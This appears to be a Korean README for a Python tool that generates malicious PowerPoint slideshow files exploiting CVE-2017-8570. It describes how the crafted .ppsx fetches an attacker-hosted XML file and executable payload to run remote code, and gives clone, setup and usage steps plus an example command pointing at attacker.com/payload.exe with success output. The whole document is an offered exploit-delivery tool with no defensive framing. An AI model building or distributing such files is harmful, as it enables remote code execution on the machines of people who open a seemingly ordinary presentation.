
cve-2017-8570용 ppsx 파일 생성기 (bhdresh/cve-2017-8570 기반)
작성자: Temesgen Yibeltal [email protected] (코드 기반: https://github.com/bhdresh/CVE-2017-8570 (현재 삭제됨))
ppsx-file-generator는 기존 파일을 기반으로 원격 소스에서 코드를 실행하는 파워포인트 슬라이드 쇼 파일을 생성하는 파이썬 도구입니다.
이 도구는 입력된 내용을 바탕으로 파워포인트 슬라이드 쇼 파일과 XML 파일을 생성합니다. 파워포인트 파일은 페이로드 파일의 정보를 담고 있는 XML 파일에 접근합니다. 공격자는 로컬 또는 공용 서버에서 XML 파일과 페이로드를 호스팅하고 각각의 URL을 입력으로 제공할 수 있습니다.
먼저 코드를 가져옵니다:
git clone https://github.com/temesgeny/ppsx-file-generator.git
ppsx-file-generator는 Python으로 작성되었으며 zipfile이 필요합니다. Pip을 사용하여 설치할 수 있습니다:
pip install zipfile
이 작업을 수행하려면 Microsoft Office PowerPoint가 필요합니다.
먼저 Microsoft Office PowerPoint를 열고 'template.ppsx'를 엽니다. 자신의 프레젠테이션 파일을 열고 template.ppsx에서 아이콘 'Coder.exe'를 복사하여 파워포인트 파일의 슬라이드 1에 붙여넣습니다. 파일을 파워포인트 쇼(.ppsx)로 저장합니다. 그런 다음 파이썬 도구를 다음과 같이 사용합니다:
사용법: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri
input_filename 입력 ppsx 파일 이름.
-o 출력 .ppsx 파일 이름, (.ppsx 포함).
-p 페이로드 exe 또는 sct 파일 URL.
접근 가능한 웹 서버에 있어야 합니다. (XML 파일의 경우 선택 사항)
-x ppsx 파일이 호출할 전체 XML URI.
접근 가능한 웹 서버에 있어야 합니다. (필수)
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
Generated content.xml successfully
Generated output.ppsx successfully